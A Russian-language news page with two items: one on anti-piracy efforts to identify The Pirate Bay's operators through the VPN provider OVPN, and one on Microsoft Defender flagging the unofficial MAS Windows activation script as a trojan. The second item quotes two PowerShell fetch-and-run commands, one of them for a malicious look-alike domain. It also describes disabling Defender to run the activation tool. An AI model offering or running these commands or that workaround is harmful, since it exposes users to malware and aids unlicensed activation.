Для поимки операторов The Pirate Bay антипираты привлекли VPN-провайдера

Для поимки операторов The Pirate Bay антипираты привлекли VPN-провайдера

Для поимки операторов The Pirate Bay антипираты привлекли VPN-провайдера

Борцы с пиратством и индустрия развлечений всё ещё пытаются положить конец деятельности The Pirate Bay, знаменитого сайта для любителей бесплатного контента. На днях они подключили к поиску администраторов площадки VPN-провайдера.

Последние 15 лет антипиратские регуляторы пытаются выследить владельцев The Pirate Bay и пресечь деятельность самого ресурса.

Популярный торрент-сайт нажил на своём пути гораздо больше врагов, чем любой другой интернет-проект. Однако, вопреки всем недоброжелателям, The Pirate Bay продолжает упорно работать. Боле того, личности его администраторов и их местоположение на сегодняшний день остаются загадкой.

Одним из самых непримиримых противников The Pirate Bay стала шведская антипиратская организация Rights Alliance, которая в этом году с особым усилием взялась за пиратскую площадку.

Всё дело в том, что администраторы The Pirate Bay якобы пользовались услугами шведского VPN-провайдера OVPN, чтобы скрыть своё настоящее местоположение.

В связи с этим Rights Alliance задалась целью получить любую информацию, которой OVPN располагает в отношении своего клиента The Pirate Bay. Ситуация осложняется тем, что OVPN, как утверждают представители провайдера, не хранит никаких логов. Следовательно, вычислить личность клиентов просто невозможно.

В настоящее время юридические баталии происходят в шведском суде, где OVPN пытается отстоять свою позицию, а антипиратская организация — настоять на раскрытии информации о владельцах The Pirate Bay.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru